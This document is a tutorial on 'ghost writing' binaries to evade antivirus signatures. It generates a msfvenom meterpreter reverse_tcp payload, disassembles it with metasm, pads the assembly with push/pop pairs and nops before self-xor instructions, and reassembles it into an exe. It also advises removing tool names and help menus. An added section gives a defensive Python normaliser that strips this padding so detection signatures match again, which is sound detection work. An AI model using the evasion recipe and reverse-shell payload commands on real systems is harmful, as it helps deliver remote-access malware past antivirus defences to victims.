Ghost Writing Binaries

  • Changing the assembly source code to alter the well-known signature used by anti-virus engines.

  • Overview

Create a .exe
Convert it to .asm 
Edit the .asm file
Convert back to .exe 
  • Most of the time you don't want to alter the functionality of the binary.

  • Some additional (outside of Ghostwriting) things that can help with evading signatures are:

Removing the Help menu of a tool
Removing instances of the tool name in the source code

Ghost Writing How To

  • Generate a msfvenom payload for example

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -f raw -o payload.raw --platform windows -a x86
ruby /opt/metasm/samples/disassemble.rb payload.raw > payload.asm
  • Now open the file in gedit

Obfuscation of ASM File

  • At the very top of the file add:

.section '.text' rwx
.entrypoint
  • Now start by finding any instance of xor where a register is xor'ed against itself.

  • When a register is xor'ed with itself, the register is cleared to a value of 0.

  • For example, look for something like this:

xor eax, eax
  • Because the normal code execution will clear out any value in eax anyway, we can add additional instructions before the xor.

  • Thus we can add this in before the xor statement:

push eax
pop eax
xor eax, eax
  • Also feel free to add other irrelevant instructions before an xor occurs. Remember: only where an operand is xor'ed with itself.

  • You can also add nop instructions into the program at the correct places.

  • Testing is your best friend here.
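From the detection side, an added example that is not part of the original page: a small Python normaliser that strips exactly the dead padding this recipe inserts (nops and a balanced push/pop of the register that is about to be zeroed) in front of a self-xor, so that a signature computed over the normalised instruction stream matches the unmodified payload again. The two listings are constructed for illustration; the register names and instruction order are assumptions, not taken from a real payload.

```python
import hashlib
import re

# Constructed sample: the unmodified stream and a ghostwritten copy of it.
ORIGINAL_ASM = """\
xor eax, eax
push eax
push 0x1234
call ebp
"""
GHOSTWRITTEN_ASM = """\
push eax      ; dead: eax is cleared by the xor below anyway
pop eax
nop
nop
xor eax, eax
push eax
push 0x1234
call ebp
"""

# Matches "xor r, r" for any register name (case-insensitive after lowering).
SELF_XOR = re.compile(r"xor\s+(\w+)\s*,\s*\1")


def _instructions(asm):
    """Split a listing into lowercased instructions, dropping blanks and ';' comments."""
    lines = (line.split(";", 1)[0].strip().lower() for line in asm.splitlines())
    return [re.sub(r"\s+", " ", line) for line in lines if line]


def normalize(asm):
    """Drop nops and balanced `push r` / `pop r` pairs directly before `xor r, r`.

    Both forms leave r (and the stack pointer) unchanged, so removing them
    recovers the instruction stream the padding was meant to hide.
    Returns (normalised_instructions, number_of_instructions_removed).
    """
    kept, removed = [], 0
    for ins in _instructions(asm):
        match = SELF_XOR.fullmatch(ins)
        if match:
            reg = match.group(1)
            while kept:  # peel padding off the end of what has been kept so far
                if kept[-1] == "nop":
                    del kept[-1]
                    removed += 1
                elif kept[-2:] == [f"push {reg}", f"pop {reg}"]:
                    del kept[-2:]
                    removed += 2
                else:
                    break
        kept.append(ins)
    return kept, removed


def normalized_signature(asm):
    """SHA-256 over the normalised stream; equal for padded and unpadded copies."""
    return hashlib.sha256("\n".join(normalize(asm)[0]).encode()).hexdigest()
```

Real listings carry many more dead-code variants than nops and push/pop pairs, so treat this as a demonstration of why the padding is shallow rather than as a complete normaliser.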

Convert Back

  • Once you are done altering the asm, it is time to convert it back to an exe.

ruby /opt/metasm/samples/peencode.rb payload.asm -o payload.exe
